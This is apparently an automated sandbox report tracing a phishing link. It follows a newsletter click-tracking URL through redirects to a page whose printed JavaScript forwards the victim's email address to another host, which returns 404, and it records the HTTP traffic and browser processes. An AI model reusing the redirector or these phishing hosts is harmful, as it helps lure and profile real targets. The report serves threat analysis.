                              reporting-endpoints: default="/_/IdentityListAccountsHttp/web-reports?context=eJzjMtDikmLw1JBiOHxtB5Meyy0mIyCe2_2UaSEQH4x7znQUiHf4eLA4pc9gDQBiIR6OR-_617EJ_Lgy6T8TALp_GE8"
                              Server: ESF
                              X-XSS-Protection: 0
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Accept-Ranges: none
                              Vary: Accept-Encoding
                              Connection: close
                              Transfer-Encoding: chunked
                              2024-02-07 21:34:26 UTC23INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                              Data Ascii: 11["gaia.l.a.r",[]]
                              2024-02-07 21:34:26 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.449735104.18.69.404433716C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-07 21:34:28 UTC1390OUTGET /ls/click?upn=fBLT-2BLuQl3NwiQlY-2FUB-2F7yZK63rzVbOt6SRjyVrBIqFzFDo8M-2Fg4Bo4-2BO4hpom8z7ZLuxy2QxlYMgW1Gzy6pwCm23aez0vVyhBm7eCGwE0WdMbo1BXh-2BFRtbcaklbKh26FDy0n-2FdQ9t7RCwaH39WupxeBlLns-2FCYgl5f1ctJEhM-3DLmFo_AmeWD5ZsKC-2B3ZheZjnDpbUkAKgKl5WpTuOJCpyDqXRc8K-2FlFlJ4-2Bn1zDfmQE1bOIB5-2BmaBYS52bqAMuImdaBWt-2B7NcvDjHLSjDEqun4F40VGOju6f5eraMm-2BmA2cI4TwN5m-2FdXmsuh3AvB8I3hqCf5Su72C52AB82bXT78OFaGhLdykrKPYdzAmNePbUMkJfeZ1o1xXkpY533PpjggEufwqS96U2lHFtuM0AF0XznjCWvz2-2FAJxdv2yOU4Rja8sE1aVzAzUItssHkUW9tujzTKsHooxa0T1wqU-2BXsNw6IZYMBuNd2XQD3BPavL2FyKwgqOl-2BNlCpAsuRQyxxqbQ0sxmCsvEzI2nw166vYROKCjGmPPQtR1NyNiLpj317EtiqLrlvsktdS8N6bgTfK0t-2FA2HLcAR1clK9xdGWlVkoBfmmnRGIBboAePQ8ToZagwj4auB1PmTKZ9aQMtFdh-2FNJV17VPUH2ibgU2d8MV21fLKU-3D HTTP/1.1
                              Host: link.mail.beehiiv.com
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              sec-ch-ua-platform: "Windows"
                              Upgrade-Insecure-Requests: 1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: navigate
                              Sec-Fetch-User: ?1
                              Sec-Fetch-Dest: document
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-07 21:34:28 UTC644INHTTP/1.1 302 Found
                              Date: Wed, 07 Feb 2024 21:34:28 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Location: https://djdhde.mypi.co/sss?utm_source=capils-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-post
                              X-Robots-Tag: noindex, nofollow
                              CF-Cache-Status: DYNAMIC
                              Set-Cookie: __cf_bm=tuRiOP3rBf.7.b50X4whJueIUEBNU_35Ig9_v4X3OUI-1707341668-1-AYVhG5QGfTC3IcFPcC2MoQnAWaljYz/azE/rSglHMOyC8Y52678qSep77SibZpyodJnIrLv3lEYBofGduHJYcaY=; path=/; expires=Wed, 07-Feb-24 22:04:28 GMT; domain=.beehiiv.com; HttpOnly; Secure; SameSite=None
                              Server: cloudflare
                              CF-RAY: 851ec1d3eedb53f9-ATL
                              2024-02-07 21:34:28 UTC148INData Raw: 38 65 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6a 64 68 64 65 2e 6d 79 70 69 2e 63 6f 2f 73 73 73 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 63 61 70 69 6c 73 2d 6e 65 77 73 6c 65 74 74 65 72 2e 62 65 65 68 69 69 76 2e 63 6f 6d 26 61 6d 70 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 6e 65 77 73 6c 65 74 74 65 72 26 61 6d 70 3b 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 6e 65 77 2d 70 6f 73 74 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a 0d 0a
                              Data Ascii: 8e<a href="https://djdhde.mypi.co/sss?utm_source=capils-newsletter.beehiiv.com&amp;utm_medium=newsletter&amp;utm_campaign=new-post">Found</a>.
                              2024-02-07 21:34:28 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.44973823.237.26.1354433716C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-07 21:34:29 UTC745OUTGET /sss?utm_source=capils-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-post HTTP/1.1
                              Host: djdhde.mypi.co
                              Connection: keep-alive
                              Upgrade-Insecure-Requests: 1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: navigate
                              Sec-Fetch-User: ?1
                              Sec-Fetch-Dest: document
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              sec-ch-ua-platform: "Windows"
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-07 21:34:29 UTC296INHTTP/1.1 301 Moved Permanently
                              Date: Wed, 07 Feb 2024 21:34:29 GMT
                              Server: Apache
                              Location: https://djdhde.mypi.co/sss/?utm_source=capils-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-post
                              Content-Length: 328
                              Connection: close
                              Content-Type: text/html; charset=iso-8859-1
                              2024-02-07 21:34:29 UTC328INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6a 64 68 64 65 2e 6d 79 70 69 2e 63 6f 2f 73 73 73 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 63 61 70 69 6c 73 2d 6e 65 77 73 6c 65 74 74 65 72 2e 62 65 65 68 69 69 76 2e 63 6f 6d 26 61 6d 70 3b 75 74 6d 5f 6d
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://djdhde.mypi.co/sss/?utm_source=capils-newsletter.beehiiv.com&amp;utm_m


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              4192.168.2.44973923.237.26.1354433716C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-07 21:34:29 UTC746OUTGET /sss/?utm_source=capils-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-post HTTP/1.1
                              Host: djdhde.mypi.co
                              Connection: keep-alive
                              Upgrade-Insecure-Requests: 1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: navigate
                              Sec-Fetch-User: ?1
                              Sec-Fetch-Dest: document
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              sec-ch-ua-platform: "Windows"
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-07 21:34:30 UTC159INHTTP/1.1 200 OK
                              Date: Wed, 07 Feb 2024 21:34:30 GMT
                              Server: Apache
                              Connection: close
                              Transfer-Encoding: chunked
                              Content-Type: text/html; charset=UTF-8
                              2024-02-07 21:34:30 UTC243INData Raw: 65 38 0d 0a 0d 0a 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 0d 0a 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 76 61 72 20 75 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 2f 22 29 20 2b 20 31 3b 0d 0a 20 20 20 20 76 61 72 20 64 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 73 75 62 73 74 72 69 6e 67 28 75 29 3b 0d 0a 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 22 68 74 74 70 73 3a 2f 2f 39 35 6d 63 35 2e 7a 61 6c 30 2e 63 6f 6d 2f 31 63 35 39 2f 22 20 2b 20 64 29 3b 0d 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 74 6d 6c 3e 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: e8<html> <body></body> <script> var u = window.location.href.lastIndexOf("/") + 1; var d = window.location.href.substring(u); window.location.replace("https://95mc5.zal0.com/1c59/" + d); </script></html> 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              5192.168.2.449740104.21.42.314433716C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-07 21:34:30 UTC723OUTGET /1c59/marketing@virtualintelligencebriefing.com HTTP/1.1
                              Host: 95mc5.zal0.com
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              sec-ch-ua-platform: "Windows"
                              Upgrade-Insecure-Requests: 1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                              Sec-Fetch-Site: cross-site
                              Sec-Fetch-Mode: navigate
                              Sec-Fetch-Dest: document
                              Referer: https://djdhde.mypi.co/
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-07 21:34:31 UTC589INHTTP/1.1 404 Not Found
                              Date: Wed, 07 Feb 2024 21:34:31 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FG%2BfyszLrrBCWercKIshC902%2FplEgx%2FXeKvH%2BixlHMYPY31RpWzM5YCxH68UPwHF80HBq%2Bkh69RWzjwmbw319zrhC5J9DkCMytc0PHC9ry5uKvfClRrSUj38vv77mrJOkg%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 851ec1e36dff0d16-ATL
                              alt-svc: h3=":443"; ma=86400
                              2024-02-07 21:34:31 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              6192.168.2.44974123.33.136.127443
                              TimestampBytes transferredDirectionData
                              2024-02-07 21:34:31 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              Accept-Encoding: identity
                              User-Agent: Microsoft BITS/7.8
                              Host: fs.microsoft.com
                              2024-02-07 21:34:31 UTC533INHTTP/1.1 200 OK
                              Content-Type: application/octet-stream
                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                              X-Ms-ApiVersion: Distribute 1.2
                              X-Ms-Region: prod-eus2-z1
                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                              X-MSEdge-Ref: Ref A: BE71B5831CA04805BAA298A51D13B882 Ref B: BLUEDGE1705 Ref C: 2024-02-07T01:18:20Z
                              Cache-Control: public, max-age=186226
                              Date: Wed, 07 Feb 2024 21:34:31 GMT
                              Connection: close
                              X-CID: 2


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              7192.168.2.44974423.33.136.127443
                              TimestampBytes transferredDirectionData
                              2024-02-07 21:34:31 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              Accept-Encoding: identity
                              If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                              Range: bytes=0-2147483646
                              User-Agent: Microsoft BITS/7.8
                              Host: fs.microsoft.com
                              2024-02-07 21:34:31 UTC531INHTTP/1.1 200 OK
                              Content-Type: application/octet-stream
                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                              ApiVersion: Distribute 1.1
                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                              X-Azure-Ref: 0URSoYgAAAABePpjyRlUAQrduejDbkqt8U0pDRURHRTA1MjAAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm
                              Cache-Control: public, max-age=132790
                              Date: Wed, 07 Feb 2024 21:34:31 GMT
                              Content-Length: 55
                              Connection: close
                              X-CID: 2
                              2024-02-07 21:34:31 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                              Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              8192.168.2.44974535.190.80.14433716C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-07 21:34:31 UTC543OUTOPTIONS /report/v3?s=%2FG%2BfyszLrrBCWercKIshC902%2FplEgx%2FXeKvH%2BixlHMYPY31RpWzM5YCxH68UPwHF80HBq%2Bkh69RWzjwmbw319zrhC5J9DkCMytc0PHC9ry5uKvfClRrSUj38vv77mrJOkg%3D%3D HTTP/1.1
                              Host: a.nel.cloudflare.com
                              Connection: keep-alive
                              Origin: https://95mc5.zal0.com
                              Access-Control-Request-Method: POST
                              Access-Control-Request-Headers: content-type
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-07 21:34:32 UTC336INHTTP/1.1 200 OK
                              Content-Length: 0
                              access-control-max-age: 86400
                              access-control-allow-methods: OPTIONS, POST
                              access-control-allow-origin: *
                              access-control-allow-headers: content-length, content-type
                              date: Wed, 07 Feb 2024 21:34:31 GMT
                              Via: 1.1 google
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              9192.168.2.44974635.190.80.14433716C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-07 21:34:32 UTC486OUTPOST /report/v3?s=%2FG%2BfyszLrrBCWercKIshC902%2FplEgx%2FXeKvH%2BixlHMYPY31RpWzM5YCxH68UPwHF80HBq%2Bkh69RWzjwmbw319zrhC5J9DkCMytc0PHC9ry5uKvfClRrSUj38vv77mrJOkg%3D%3D HTTP/1.1
                              Host: a.nel.cloudflare.com
                              Connection: keep-alive
                              Content-Length: 453
                              Content-Type: application/reports+json
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-07 21:34:32 UTC453OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 30 38 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 64 6a 64 68 64 65 2e 6d 79 70 69 2e 63 6f 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 34 32 2e 33 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68
                              Data Ascii: [{"age":0,"body":{"elapsed_time":1083,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://djdhde.mypi.co/","sampling_fraction":1.0,"server_ip":"104.21.42.31","status_code":404,"type":"http.error"},"type":"network-error","url":"h
                              2024-02-07 21:34:32 UTC168INHTTP/1.1 200 OK
                              Content-Length: 0
                              date: Wed, 07 Feb 2024 21:34:32 GMT
                              Via: 1.1 google
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination Port
                              10192.168.2.44975674.125.136.100443
                              TimestampBytes transferredDirectionData
                              2024-02-07 21:35:55 UTC449OUTGET /tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=0000000000000000000000000000000000000000B5F725C74D HTTP/1.1
                              Host: clients1.google.com
                              Connection: keep-alive
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: empty
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept-Encoding: gzip, deflate, br
                              2024-02-07 21:35:56 UTC817INHTTP/1.1 200 OK
                              Content-Security-Policy: script-src 'report-sample' 'nonce-6iO4FBQ6Wl5SgndR_QGMew' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/download-dt/1
                              Content-Security-Policy: script-src 'report-sample' 'nonce-6aQ3pZn1eqfFrw7tRx2uBQ' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/download-dt/1
                              Content-Type: text/plain; charset=utf-8
                              Content-Length: 219
                              Date: Wed, 07 Feb 2024 21:35:56 GMT
                              Expires: Wed, 07 Feb 2024 21:35:56 GMT
                              Cache-Control: private, max-age=0
                              X-Content-Type-Options: nosniff
                              X-Frame-Options: SAMEORIGIN
                              X-XSS-Protection: 1; mode=block
                              Server: GSE
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Connection: close
                              2024-02-07 21:35:56 UTC219INData Raw: 72 6c 7a 43 31 3a 20 31 43 31 4f 4e 47 52 5f 65 6e 55 53 31 30 39 36 0a 72 6c 7a 43 32 3a 20 31 43 32 4f 4e 47 52 5f 65 6e 55 53 31 30 39 36 0a 72 6c 7a 43 37 3a 20 31 43 37 4f 4e 47 52 5f 65 6e 55 53 31 30 39 36 0a 64 63 63 3a 20 0a 73 65 74 5f 64 63 63 3a 20 43 31 3a 31 43 31 4f 4e 47 52 5f 65 6e 55 53 31 30 39 36 2c 43 32 3a 31 43 32 4f 4e 47 52 5f 65 6e 55 53 31 30 39 36 2c 43 37 3a 31 43 37 4f 4e 47 52 5f 65 6e 55 53 31 30 39 36 0a 65 76 65 6e 74 73 3a 20 43 31 49 2c 43 32 49 2c 43 37 49 2c 43 31 53 2c 43 37 53 0a 73 74 61 74 65 66 75 6c 2d 65 76 65 6e 74 73 3a 20 43 31 49 2c 43 32 49 2c 43 37 49 0a 63 72 63 33 32 3a 20 61 33 33 39 63 61 64 0a
                              Data Ascii: rlzC1: 1C1ONGR_enUS1096rlzC2: 1C2ONGR_enUS1096rlzC7: 1C7ONGR_enUS1096dcc: set_dcc: C1:1C1ONGR_enUS1096,C2:1C2ONGR_enUS1096,C7:1C7ONGR_enUS1096events: C1I,C2I,C7I,C1S,C7Sstateful-events: C1I,C2I,C7Icrc32: a339cad


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:22:34:24
                              Start date:07/02/2024
                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
                              Imagebase:0x7ff76e190000
                              File size:3'242'272 bytes
                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:false

                              General

                              Target ID:2
                              Start time:22:34:25
                              Start date:07/02/2024
                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2016,i,9153540945449359898,776365275202532557,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                              Imagebase:0x7ff76e190000
                              File size:3'242'272 bytes
                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:false

                              General

                              Target ID:3
                              Start time:22:34:27
                              Start date:07/02/2024
                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" "https://link.mail.beehiiv.com/ls/click?upn=fBLT-2BLuQl3NwiQlY-2FUB-2F7yZK63rzVbOt6SRjyVrBIqFzFDo8M-2Fg4Bo4-2BO4hpom8z7ZLuxy2QxlYMgW1Gzy6pwCm23aez0vVyhBm7eCGwE0WdMbo1BXh-2BFRtbcaklbKh26FDy0n-2FdQ9t7RCwaH39WupxeBlLns-2FCYgl5f1ctJEhM-3DLmFo_AmeWD5ZsKC-2B3ZheZjnDpbUkAKgKl5WpTuOJCpyDqXRc8K-2FlFlJ4-2Bn1zDfmQE1bOIB5-2BmaBYS52bqAMuImdaBWt-2B7NcvDjHLSjDEqun4F40VGOju6f5eraMm-2BmA2cI4TwN5m-2FdXmsuh3AvB8I3hqCf5Su72C52AB82bXT78OFaGhLdykrKPYdzAmNePbUMkJfeZ1o1xXkpY533PpjggEufwqS96U2lHFtuM0AF0XznjCWvz2-2FAJxdv2yOU4Rja8sE1aVzAzUItssHkUW9tujzTKsHooxa0T1wqU-2BXsNw6IZYMBuNd2XQD3BPavL2FyKwgqOl-2BNlCpAsuRQyxxqbQ0sxmCsvEzI2nw166vYROKCjGmPPQtR1NyNiLpj317EtiqLrlvsktdS8N6bgTfK0t-2FA2HLcAR1clK9xdGWlVkoBfmmnRGIBboAePQ8ToZagwj4auB1PmTKZ9aQMtFdh-2FNJV17VPUH2ibgU2d8MV21fLKU-3D#/?/%23/?/marketing@virtualintelligencebriefing.com
                              Imagebase:0x7ff76e190000
                              File size:3'242'272 bytes
                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                              Disassembly

                              No disassembly